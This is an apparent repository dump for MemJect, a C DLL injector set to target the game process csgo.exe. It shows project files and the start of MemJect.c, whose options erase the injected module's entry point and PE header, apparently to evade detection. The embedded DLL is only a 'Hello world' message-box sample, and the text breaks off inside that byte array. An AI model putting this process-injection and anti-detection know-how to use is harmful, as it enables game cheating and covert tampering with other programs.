├── .github
    └── FUNDING.yml
├── .gitignore
├── LICENSE
├── MemJect.sln
├── MemJect
    ├── MemJect.c
    ├── MemJect.vcxproj
    └── MemJect.vcxproj.filters
└── README.md


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | custom: https://paypal.me/DanielK19
2 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Aa][Rr][Mm]/
 27 | [Aa][Rr][Mm]64/
 28 | bld/
 29 | [Bb]in/
 30 | [Oo]bj/
 31 | [Ll]og/
 32 | 
 33 | # Visual Studio 2015/2017 cache/options directory
 34 | .vs/
 35 | # Uncomment if you have tasks that create the project's static files in wwwroot
 36 | #wwwroot/
 37 | 
 38 | # Visual Studio 2017 auto generated files
 39 | Generated\ Files/
 40 | 
 41 | # MSTest test Results
 42 | [Tt]est[Rr]esult*/
 43 | [Bb]uild[Ll]og.*
 44 | 
 45 | # NUnit
 46 | *.VisualState.xml
 47 | TestResult.xml
 48 | nunit-*.xml
 49 | 
 50 | # Build Results of an ATL Project
 51 | [Dd]ebugPS/
 52 | [Rr]eleasePS/
 53 | dlldata.c
 54 | 
 55 | # Benchmark Results
 56 | BenchmarkDotNet.Artifacts/
 57 | 
 58 | # .NET Core
 59 | project.lock.json
 60 | project.fragment.lock.json
 61 | artifacts/
 62 | 
 63 | # StyleCop
 64 | StyleCopReport.xml
 65 | 
 66 | # Files built by Visual Studio
 67 | *_i.c
 68 | *_p.c
 69 | *_h.h
 70 | *.ilk
 71 | *.meta
 72 | *.obj
 73 | *.iobj
 74 | *.pch
 75 | *.pdb
 76 | *.ipdb
 77 | *.pgc
 78 | *.pgd
 79 | *.rsp
 80 | *.sbr
 81 | *.tlb
 82 | *.tli
 83 | *.tlh
 84 | *.tmp
 85 | *.tmp_proj
 86 | *_wpftmp.csproj
 87 | *.log
 88 | *.vspscc
 89 | *.vssscc
 90 | .builds
 91 | *.pidb
 92 | *.svclog
 93 | *.scc
 94 | 
 95 | # Chutzpah Test files
 96 | _Chutzpah*
 97 | 
 98 | # Visual C++ cache files
 99 | ipch/
100 | *.aps
101 | *.ncb
102 | *.opendb
103 | *.opensdf
104 | *.sdf
105 | *.cachefile
106 | *.VC.db
107 | *.VC.VC.opendb
108 | 
109 | # Visual Studio profiler
110 | *.psess
111 | *.vsp
112 | *.vspx
113 | *.sap
114 | 
115 | # Visual Studio Trace Files
116 | *.e2e
117 | 
118 | # TFS 2012 Local Workspace
119 | $tf/
120 | 
121 | # Guidance Automation Toolkit
122 | *.gpState
123 | 
124 | # ReSharper is a .NET coding add-in
125 | _ReSharper*/
126 | *.[Rr]e[Ss]harper
127 | *.DotSettings.user
128 | 
129 | # JustCode is a .NET coding add-in
130 | .JustCode
131 | 
132 | # TeamCity is a build add-in
133 | _TeamCity*
134 | 
135 | # DotCover is a Code Coverage Tool
136 | *.dotCover
137 | 
138 | # AxoCover is a Code Coverage Tool
139 | .axoCover/*
140 | !.axoCover/settings.json
141 | 
142 | # Visual Studio code coverage results
143 | *.coverage
144 | *.coveragexml
145 | 
146 | # NCrunch
147 | _NCrunch_*
148 | .*crunch*.local.xml
149 | nCrunchTemp_*
150 | 
151 | # MightyMoose
152 | *.mm.*
153 | AutoTest.Net/
154 | 
155 | # Web workbench (sass)
156 | .sass-cache/
157 | 
158 | # Installshield output folder
159 | [Ee]xpress/
160 | 
161 | # DocProject is a documentation generator add-in
162 | DocProject/buildhelp/
163 | DocProject/Help/*.HxT
164 | DocProject/Help/*.HxC
165 | DocProject/Help/*.hhc
166 | DocProject/Help/*.hhk
167 | DocProject/Help/*.hhp
168 | DocProject/Help/Html2
169 | DocProject/Help/html
170 | 
171 | # Click-Once directory
172 | publish/
173 | 
174 | # Publish Web Output
175 | *.[Pp]ublish.xml
176 | *.azurePubxml
177 | # Note: Comment the next line if you want to checkin your web deploy settings,
178 | # but database connection strings (with potential passwords) will be unencrypted
179 | *.pubxml
180 | *.publishproj
181 | 
182 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
183 | # checkin your Azure Web App publish settings, but sensitive information contained
184 | # in these scripts will be unencrypted
185 | PublishScripts/
186 | 
187 | # NuGet Packages
188 | *.nupkg
189 | # NuGet Symbol Packages
190 | *.snupkg
191 | # The packages folder can be ignored because of Package Restore
192 | **/[Pp]ackages/*
193 | # except build/, which is used as an MSBuild target.
194 | !**/[Pp]ackages/build/
195 | # Uncomment if necessary however generally it will be regenerated when needed
196 | #!**/[Pp]ackages/repositories.config
197 | # NuGet v3's project.json files produces more ignorable files
198 | *.nuget.props
199 | *.nuget.targets
200 | 
201 | # Microsoft Azure Build Output
202 | csx/
203 | *.build.csdef
204 | 
205 | # Microsoft Azure Emulator
206 | ecf/
207 | rcf/
208 | 
209 | # Windows Store app package directories and files
210 | AppPackages/
211 | BundleArtifacts/
212 | Package.StoreAssociation.xml
213 | _pkginfo.txt
214 | *.appx
215 | *.appxbundle
216 | *.appxupload
217 | 
218 | # Visual Studio cache files
219 | # files ending in .cache can be ignored
220 | *.[Cc]ache
221 | # but keep track of directories ending in .cache
222 | !?*.[Cc]ache/
223 | 
224 | # Others
225 | ClientBin/
226 | ~$*
227 | *~
228 | *.dbmdl
229 | *.dbproj.schemaview
230 | *.jfm
231 | *.pfx
232 | *.publishsettings
233 | orleans.codegen.cs
234 | 
235 | # Including strong name files can present a security risk
236 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
237 | #*.snk
238 | 
239 | # Since there are multiple workflows, uncomment next line to ignore bower_components
240 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
241 | #bower_components/
242 | 
243 | # RIA/Silverlight projects
244 | Generated_Code/
245 | 
246 | # Backup & report files from converting an old project file
247 | # to a newer Visual Studio version. Backup files are not needed,
248 | # because we have git ;-)
249 | _UpgradeReport_Files/
250 | Backup*/
251 | UpgradeLog*.XML
252 | UpgradeLog*.htm
253 | ServiceFabricBackup/
254 | *.rptproj.bak
255 | 
256 | # SQL Server files
257 | *.mdf
258 | *.ldf
259 | *.ndf
260 | 
261 | # Business Intelligence projects
262 | *.rdl.data
263 | *.bim.layout
264 | *.bim_*.settings
265 | *.rptproj.rsuser
266 | *- [Bb]ackup.rdl
267 | *- [Bb]ackup ([0-9]).rdl
268 | *- [Bb]ackup ([0-9][0-9]).rdl
269 | 
270 | # Microsoft Fakes
271 | FakesAssemblies/
272 | 
273 | # GhostDoc plugin setting file
274 | *.GhostDoc.xml
275 | 
276 | # Node.js Tools for Visual Studio
277 | .ntvs_analysis.dat
278 | node_modules/
279 | 
280 | # Visual Studio 6 build log
281 | *.plg
282 | 
283 | # Visual Studio 6 workspace options file
284 | *.opt
285 | 
286 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
287 | *.vbw
288 | 
289 | # Visual Studio LightSwitch build output
290 | **/*.HTMLClient/GeneratedArtifacts
291 | **/*.DesktopClient/GeneratedArtifacts
292 | **/*.DesktopClient/ModelManifest.xml
293 | **/*.Server/GeneratedArtifacts
294 | **/*.Server/ModelManifest.xml
295 | _Pvt_Extensions
296 | 
297 | # Paket dependency manager
298 | .paket/paket.exe
299 | paket-files/
300 | 
301 | # FAKE - F# Make
302 | .fake/
303 | 
304 | # CodeRush personal settings
305 | .cr/personal
306 | 
307 | # Python Tools for Visual Studio (PTVS)
308 | __pycache__/
309 | *.pyc
310 | 
311 | # Cake - Uncomment if you are using it
312 | # tools/**
313 | # !tools/packages.config
314 | 
315 | # Tabs Studio
316 | *.tss
317 | 
318 | # Telerik's JustMock configuration file
319 | *.jmconfig
320 | 
321 | # BizTalk build output
322 | *.btp.cs
323 | *.btm.cs
324 | *.odx.cs
325 | *.xsd.cs
326 | 
327 | # OpenCover UI analysis results
328 | OpenCover/
329 | 
330 | # Azure Stream Analytics local run output
331 | ASALocalRun/
332 | 
333 | # MSBuild Binary and Structured Log
334 | *.binlog
335 | 
336 | # NVidia Nsight GPU debugger configuration file
337 | *.nvuser
338 | 
339 | # MFractors (Xamarin productivity tool) working folder
340 | .mfractor/
341 | 
342 | # Local History for Visual Studio
343 | .localhistory/
344 | 
345 | # BeatPulse healthcheck temp database
346 | healthchecksdb
347 | 
348 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
349 | MigrationBackup/
350 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 Daniel Krupiński
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/MemJect.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.28803.452
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MemJect", "MemJect\MemJect.vcxproj", "{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Debug|x64.Build.0 = Debug|x64
18 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Debug|x86.Build.0 = Debug|Win32
20 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Release|x64.ActiveCfg = Release|x64
21 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Release|x64.Build.0 = Release|x64
22 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Release|x86.ActiveCfg = Release|Win32
23 | 		{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {D89F71AC-E34B-4474-8706-E49C2FA86A9B}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/MemJect/MemJect.c:
--------------------------------------------------------------------------------
  1 | #include <stdint.h>
  2 | #include <stdio.h>
  3 | #include <Windows.h>
  4 | #include <TlHelp32.h>
  5 | 
  6 | // Target process name
  7 | #define PROCESS_NAME L"csgo.exe"
  8 | 
  9 | #define ERASE_ENTRY_POINT    TRUE
 10 | #define ERASE_PE_HEADER      TRUE
 11 | #define DECRYPT_DLL          FALSE
 12 | 
 13 | #define SUCCESS_MESSAGE      TRUE
 14 | 
 15 | // Your DLL as a byte array
 16 | static
 17 | #if !DECRYPT_DLL
 18 | const
 19 | #endif
 20 | uint8_t binary[] = {
 21 | 0x4d, 0x5a, 0x80, 0x00, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x10, 0x00, 0xff, 0xff, 0x00, 0x00,
 22 | 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 23 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 24 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
 25 | 0x0e, 0x1f, 0xba, 0x0e, 0x00, 0xb4, 0x09, 0xcd, 0x21, 0xb8, 0x01, 0x4c, 0xcd, 0x21, 0x54, 0x68,
 26 | 0x69, 0x73, 0x20, 0x70, 0x72, 0x6f, 0x67, 0x72, 0x61, 0x6d, 0x20, 0x63, 0x61, 0x6e, 0x6e, 0x6f,
 27 | 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6e, 0x20, 0x69, 0x6e, 0x20, 0x44, 0x4f, 0x53, 0x20,
 28 | 0x6d, 0x6f, 0x64, 0x65, 0x2e, 0x0d, 0x0a, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 29 | 0x50, 0x45, 0x00, 0x00, 0x4c, 0x01, 0x03, 0x00, 0x5c, 0x32, 0xe1, 0x5c, 0x00, 0x00, 0x00, 0x00,
 30 | 0x00, 0x00, 0x00, 0x00, 0xe0, 0x00, 0x0e, 0x21, 0x0b, 0x01, 0x01, 0x49, 0x00, 0x02, 0x00, 0x00,
 31 | 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
 32 | 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
 33 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 34 | 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0xf6, 0x66, 0x00, 0x00, 0x02, 0x00, 0x40, 0x00,
 35 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
 36 | 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 37 | 0x00, 0x20, 0x00, 0x00, 0x52, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 38 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 39 | 0x00, 0x30, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 40 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 41 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 42 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 43 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 44 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00,
 45 | 0x43, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
 46 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x20,
 47 | 0x2e, 0x69, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x52, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
 48 | 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 49 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x2e, 0x72, 0x65, 0x6c, 0x6f, 0x63, 0x00, 0x00,
 50 | 0x0a, 0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00,
 51 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x42,
 52 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 53 | 0x55, 0x89, 0xe5, 0x6a, 0x40, 0xe8, 0x0d, 0x00, 0x00, 0x00, 0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20,
 54 | 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x21, 0x00, 0xe8, 0x16, 0x00, 0x00, 0x00, 0x48, 0x65, 0x6c, 0x6c,
 55 | 0x6f, 0x20, 0x66, 0x72, 0x6f, 0x6d, 0x20, 0x46, 0x41, 0x53, 0x4d, 0x20, 0x64, 0x6c, 0x6c, 0x21,
 56 | 0x00, 0x00, 0x6a, 0x00, 0xff, 0x15, 0x3c, 0x20, 0x40, 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc9,
 57 | 0xc2, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 58 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 59 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 60 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 61 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 62 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 63 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 64 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 65 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 66 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 67 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 68 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 69 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 70 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 71 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 72 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 73 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 74 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 75 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 76 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 77 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 78 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 79 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 80 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 81 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 82 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 83 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 84 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 85 | 0x34, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x20, 0x00, 0x00,
 86 | 0x3c, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 87 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0x53, 0x45, 0x52, 0x33, 0x32, 0x2e, 0x44,
 88 | 0x4c, 0x4c, 0x00, 0x00, 0x44, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x20, 0x00, 0x00,
 89 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6f, 0x78,
 90 | 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 91 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 92 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 93 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 94 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 95 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 96 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 97 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 98 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 99 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
100 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
102 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
103 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
104 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
105 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
106 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
107 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
108 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
109 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
110 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
111 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
112 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
113 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
114 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
115 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
116 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
117 | 0x00, 0x10, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x36, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
118 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
119 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
